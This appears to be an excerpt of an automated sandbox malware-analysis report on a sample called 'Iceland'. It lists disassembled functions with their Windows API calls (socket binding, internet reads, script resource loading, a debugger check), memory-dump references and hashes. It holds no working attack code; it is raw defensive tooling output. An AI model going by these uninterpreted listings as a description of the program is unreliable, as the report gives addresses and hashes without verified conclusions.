                                                                                                                                                                                                                                                                • Opcode ID: c7821c291c0bd9d0a7b327445f1cd71fd86c12cec64bfc2ddb5e9fcb4251df75
                                                                                                                                                                                                                                                                • Instruction ID: 2d03cb4be0d9168117bc88245f0ca5ffc9b52941229d6c6b241cbbe3c28d394e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7821c291c0bd9d0a7b327445f1cd71fd86c12cec64bfc2ddb5e9fcb4251df75
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C417F31A00111AFD714DF68D584B69BBF5AF46328F188198E8568F2E3C771ED82CBE1
                                                                                                                                                                                                                                                                Function 00A5BCD2 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5BD54
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5BD78
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5BEFF
                                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00AC46D0), ref: 00A5BF11
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00AF221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00A5BF89
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00AF2270,000000FF,?,0000003F,00000000,?), ref: 00A5BFB6
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5C0CB
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 314583886-0
                                                                                                                                                                                                                                                                • Opcode ID: 719024e7a6e78bddc59e0673cb09ea03de9989d5b73f74b956792684d882d974
                                                                                                                                                                                                                                                                • Instruction ID: 6a1fb73ff2270aa67617f1d49e765d6b694885afb8ff87f9484463ec9626e9fa
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 719024e7a6e78bddc59e0673cb09ea03de9989d5b73f74b956792684d882d974
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EAC11872910245AFDB20DF68DD42BEABBB9FF45313F184159ED419B191E7308E4ACB60
                                                                                                                                                                                                                                                                Function 00A93A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00A656C2,?,?,00000000,00000000), ref: 00A93A1E
                                                                                                                                                                                                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00A656C2,?,?,00000000,00000000), ref: 00A93A35
                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000,?,?,00A656C2,?,?,00000000,00000000,?,?,?,?,?,?,00A266CE), ref: 00A93A45
                                                                                                                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000,?,?,00A656C2,?,?,00000000,00000000,?,?,?,?,?,?,00A266CE), ref: 00A93A56
                                                                                                                                                                                                                                                                • LockResource.KERNEL32(00A656C2,?,?,00A656C2,?,?,00000000,00000000,?,?,?,?,?,?,00A266CE,?), ref: 00A93A65
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                • String ID: SCRIPT
                                                                                                                                                                                                                                                                • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                • Opcode ID: b14fc97230c10e2b8fe290383a5fb374dbb41e9a8b2fdd4ff84e4390a2c9f2d4
                                                                                                                                                                                                                                                                • Instruction ID: c45b542e9313cc76f7a06a88fbd23e87bcf730d68bb1353dcea559d4c0c53b87
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b14fc97230c10e2b8fe290383a5fb374dbb41e9a8b2fdd4ff84e4390a2c9f2d4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A113C71200741BFDB218F65DC48F677BB9EBC5B91F14466CB4469A660EBB2DD018620
                                                                                                                                                                                                                                                                Function 00A820AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A81916
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A81922
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A81931
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A81938
                                                                                                                                                                                                                                                                  • Part of subcall function 00A81900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A8194E
                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?,00000000,00A81C81), ref: 00A820FB
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A82107
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00A8210E
                                                                                                                                                                                                                                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 00A82127
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00A81C81), ref: 00A8213B
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A82142
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                • Opcode ID: a8eb1ad814c2f8cfc9cd9f00f562faf12f30212ba00962033f5eec426be4f217
                                                                                                                                                                                                                                                                • Instruction ID: 78b990f5374da9771ca8c3d1dbdc2ca983eae1a17ea6e0e87a0586b229b81f05
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8eb1ad814c2f8cfc9cd9f00f562faf12f30212ba00962033f5eec426be4f217
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9711D0B1500205FFDB24EFA4DC0DBBE7BB9EF44355F244218E942A7121D7359942CB60
                                                                                                                                                                                                                                                                Function 00A9A570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00A9A5BD
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00A9A6D0
                                                                                                                                                                                                                                                                  • Part of subcall function 00A942B9: GetInputState.USER32 ref: 00A94310
                                                                                                                                                                                                                                                                  • Part of subcall function 00A942B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A943AB
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00A9A5ED
                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00A9A6BA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                • Opcode ID: 3a5b25b5ff012ff2007c793df2dfbd2dbd077715b2097cb288a68c5e03ff62da
                                                                                                                                                                                                                                                                • Instruction ID: 1284e455c5fd475b184e9fa493386ba3f8611480fca6dd4e716a273357898c0b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a5b25b5ff012ff2007c793df2dfbd2dbd077715b2097cb288a68c5e03ff62da
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A418175A0020AAFDF14DFA4DD49AEEBBF8FF15310F144166E905A21A1EB309E44CFA1
                                                                                                                                                                                                                                                                Function 00A222AD Relevance: 7.8, APIs: 5, Instructions: 308COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,?), ref: 00A2233E
                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00A22421
                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 00A22434
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Color$Proc
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 929743424-0
                                                                                                                                                                                                                                                                • Opcode ID: 0b101bb55016cb42ae543e83bffe35178f80dfead0093a3808a84fd2b1b6bdb6
                                                                                                                                                                                                                                                                • Instruction ID: b3d7af555a28fa61aab4c704ca9d094a0192d84b4a889155d0673365e20dfceb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b101bb55016cb42ae543e83bffe35178f80dfead0093a3808a84fd2b1b6bdb6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A81E4B1104424BAEA39EB3C6D98FFF257EDB42300B150229F502DA596C959DF439376
                                                                                                                                                                                                                                                                Function 00AA2263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00AA3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00AA3AD7
                                                                                                                                                                                                                                                                  • Part of subcall function 00AA3AAB: _wcslen.LIBCMT ref: 00AA3AF8
                                                                                                                                                                                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00AA22BA
                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AA22E1
                                                                                                                                                                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00AA2338
                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AA2343
                                                                                                                                                                                                                                                                • closesocket.WSOCK32(00000000), ref: 00AA2372
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                • Opcode ID: 792c556911e7307593116ce522173cb660d6a9dc5a60c544ec7c99767d1b0e30
                                                                                                                                                                                                                                                                • Instruction ID: 154e0082e3212f6efe9703d02a5a58943e30beb56a34cd1218f01b5f8dfa979f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 792c556911e7307593116ce522173cb660d6a9dc5a60c544ec7c99767d1b0e30
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A051C271A00210AFEB10EF68D986F6A77E5AB49714F048098F9459F3D3DB74ED428BE1
                                                                                                                                                                                                                                                                Function 00AB26DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 292994002-0
                                                                                                                                                                                                                                                                • Opcode ID: d34f689cf58ac7e1dd05b4048c1598abd29983c655fee749f1e0cffd1a2e6c79
                                                                                                                                                                                                                                                                • Instruction ID: 3063268113921d4ec34b08d86edc2b4b3cd90e8ec4f5b904b72a2ac49f05b56b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d34f689cf58ac7e1dd05b4048c1598abd29983c655fee749f1e0cffd1a2e6c79
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA21E5357002119FD7119F2AC844B9A7BA9FF85314F18806AE8498B353DF71EC82CB94
                                                                                                                                                                                                                                                                Function 00A9D889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InternetReadFile.WININET(?,?,00000400,?), ref: 00A9D8CE
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 00A9D92F
                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?,?,00000000), ref: 00A9D943
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 234945975-0
                                                                                                                                                                                                                                                                • Opcode ID: e2abcc2650309b81b8f8a678f85580b231484887d13334d5871eacb4cbc152d8
                                                                                                                                                                                                                                                                • Instruction ID: 9d3272793037eacf7aebc64888994b0c31bfee864707c5083a4cd4f2de93050d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2abcc2650309b81b8f8a678f85580b231484887d13334d5871eacb4cbc152d8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC21AF75600705EFEB30EFA6C988BAAB7FCEB41314F10442DE64692552E774EA85CB90
                                                                                                                                                                                                                                                                Function 00A8E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,00A646AC), ref: 00A8E482
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00A8E491
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00A8E4A2
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00A8E4AE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                • Opcode ID: 953049c3ac92f2b55315baa37c94963a20e33c465c94fea461d5e3610fd194ad
                                                                                                                                                                                                                                                                • Instruction ID: 82983eddba4f4632a6da7950004ebab1f572da93eb91ac6982ab73b794bb5ac6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 953049c3ac92f2b55315baa37c94963a20e33c465c94fea461d5e3610fd194ad
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8F0A030410910979314F7BCAC0D8AA766DAE82335B504701F83AC20F0F7BA99968695
                                                                                                                                                                                                                                                                Function 00A7E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LocalTime
                                                                                                                                                                                                                                                                • String ID: %.3d$X64
                                                                                                                                                                                                                                                                • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                • Opcode ID: ec7257e3687e71d5a8149b03dd99fd1768ffdcdf6864e815b4ab8e186f8b80d5
                                                                                                                                                                                                                                                                • Instruction ID: 100d9fb2d95483c5c7f06185ddab2b0310be62cd6def842c2535cfd8300b3a4f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec7257e3687e71d5a8149b03dd99fd1768ffdcdf6864e815b4ab8e186f8b80d5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2BD062B1C04159EACBD4D6909D49DB973BCBB1C700F64C9A6F90AD1051F63499549721
                                                                                                                                                                                                                                                                Function 00A52992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00A52A8A
                                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00A52A94
                                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00A52AA1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                • Opcode ID: 9905c525a512b02e50a3b88ccf7e89350af18e7820f760d51ebf987e5e606644
                                                                                                                                                                                                                                                                • Instruction ID: 99e9bcd78f37de28aedbcbd833e601e028f0a1ede9465fc6b2d1b80074f828a5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9905c525a512b02e50a3b88ccf7e89350af18e7820f760d51ebf987e5e606644
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC31B3759012289BCB21DF68DD89BDDBBB8BF48311F5042DAE90CA6261E7309F858F45
                                                                                                                                                                                                                                                                Function 00A82010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A4014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00A409D8
